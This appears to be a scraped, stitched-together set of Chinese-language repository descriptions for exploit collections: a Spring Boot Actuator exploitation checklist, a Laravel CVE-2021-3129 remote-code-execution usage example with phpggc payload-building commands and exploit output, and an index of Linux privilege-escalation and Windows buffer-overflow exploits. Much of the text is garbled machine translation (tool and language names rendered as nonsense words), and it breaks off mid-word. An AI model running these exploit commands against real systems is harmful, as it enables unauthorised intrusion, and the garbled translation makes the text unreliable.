Python_漏洞 我编写的Python脚本和漏洞利用程序可以解决各种挑战，包括CTF。

Spring Boot漏洞利用检查清单 Spring Boot相关突破学习资料，利用方法和技巧合集，黑盒安全评估清单 声明 :warning:本项目所有内容仅作为安全研究和授权测试使用，相关人员对因误用和滥用该项目造成的一切损害概不负责 目录 零：路由和版本 0x01：路由知识 一些程序员会自定义/manage ， /management ，项目App相关名称为spring根路径 Spring启动器的1.x版本默认内置路由的起始路径为/ ，2.X版本则统一以/actuator为起始路径 Spring Boot Actuator默认的内置路由名称，如/env有时候也会被程序员修改， /appenv修改成/appenv 0x02：版本知识 Spring Cloud是基于Spring Boot来进行整合服务，并提供如配置管理，服务注册与发现，智能路由等常见功能的帮助快速开发分布式系统的系列框架的有序集合

laravel漏洞 漏洞利用CVE-2021-3129详细信息： ://www.ambionics.io/blog/laravel-debug-rce 用法 $ php -d ' phar.readonly=0 ' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id $ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log Logs cleared Successfully converted to PHAR ! Phar deserialized -----------

Momigari -- Overview of the latest Windows OS kernel exploits found in the wild

漏洞利用 大部分可以使用的漏洞利用。 它们要么不需要修改，要么已经修改并验证为功能性。 要在 linux 中检查 md5sum，请键入md5sum -c md5sum.txt Linux 在哪里 类型 平台 破解 目录 郎 两个都 漏洞利用程序 Linux 不适用 /lin/suggest_exploit.pl 珀尔 两个都 私人退出 Linux 出口 4.69 /lin/pe-exim4 珀尔 当地的 私人退出 Linux 内核 <= 2.6.36-rc8 /lin/pe-kernel-rds C 当地的 私人退出 Linux 内核 <= 3.2.2 /lin/pe-memodipper C 视窗 在哪里 类型 平台 破解 目录 郎 偏僻的 缓冲区溢出 视窗 XP SP2 战争-FTP 1.65 /win/bof-warftp Python 偏僻的 缓